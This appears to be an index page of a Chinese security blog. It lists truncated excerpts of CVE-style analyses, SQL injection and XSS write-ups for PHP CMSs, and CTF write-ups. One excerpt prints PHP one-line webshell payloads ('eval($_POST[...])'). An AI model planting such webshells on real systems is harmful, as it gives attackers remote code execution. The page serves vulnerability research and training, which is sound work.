没人比我更了解攻击队,他们肯定已经写好投降书了。我想给大家说个消息:“现在攻击方的分数都不低了”当你还在创作防守日记突然身后站着一位攻击队选手正在认真的记着桌面上的VPN登录密码....1、Think...
09月17日376 views评论html
php
HW平安夜: 09/16 风平浪静
09月17日376 views评论html
php
09月17日376 views评论html
php
Wordpress File-manager 任意文件上传漏洞分析
漏洞分析分析环境:wordpress 5.5.1file manager 6.0win10 phpstudy php 7.0.9漏洞点位于file manager的connector.minimal....
09月15日288 views评论php
漏洞
“中能融合杯”全国第六届工控系统信息安全攻防竞赛Wp
比赛时间:2020-09-12 09:00:00- 17:00:00签到题本题考查西门子S7协议,发送题目给出的报文0300002402f080320100000009000e00050...
09月14日1,434 views评论post
工控
一些常用的一句话分享
php-基本 <?php eval($_POST[cc123]) ?><?php @eval($_POST['cc123']);?>php变形记 <?php $a = s...
09月04日296 views评论php
post
ctf中php常见的考点
本博文转自:大佬博客(侵权删)总结的很详细,忍不住转载系统变量$_POST // 获取 post 数据,是一个字典$_GET // 获取 get 数据,是一个字典$_COOKIE // 获取 cook...
05月13日CTF专场44 views评论get
php
ThinkSAAS SQL注入
版本 ThinkSAAS 2.32 目前最新版。 app/group/action/do.php 281行post变量全局做了转义,$content = tsClean($_POS...
01月01日790 views评论post
token
ThinkOX 最新版 SQL 注入(盲注)
/Application/Group/Controller/GroupController.class.php这两处都是直接拼接的,导致调用这两处函数的地方存在注入。因为返回的只是...
01月01日漏洞时代655 views评论id
post
wordpress主题dmeng存在XSS跨站
由于某编辑辛苦弄了一套主题。然后被某墨盒测试出来一个XSS漏洞。然后就丢给我。让我看看这个漏洞能不能修复。 首先找到问题所在,是在发送私信的地方存在对参数每一过滤好造成的。读取的时...
01月01日481 views评论get
xss
程式舞曲SQL注入
Fengcms SQL injection & 读取任意文件漏洞
Fengcms SQL injection & 读任意文件 & XSS。[php] if(!empty($_POST)){if(URL_TYPE==1){echo ...
01月01日359 views评论post
sql
PHPMyWind绕过过滤SQL注入(限定条件)
PHPMyWind设计缺陷绕过过滤SQL注入我会在标题里面告诉你们其实是全局变量覆盖吗?需要register_globals=on。 /include/common.inc.php...
01月01日825 views评论get
sql
Phpyun SQL注入两枚
漏洞一:/member/model/com.class.php中[php]function job(){。。。570行 if($_GET['del'] || is_array($_...
01月01日342 views评论get
post
21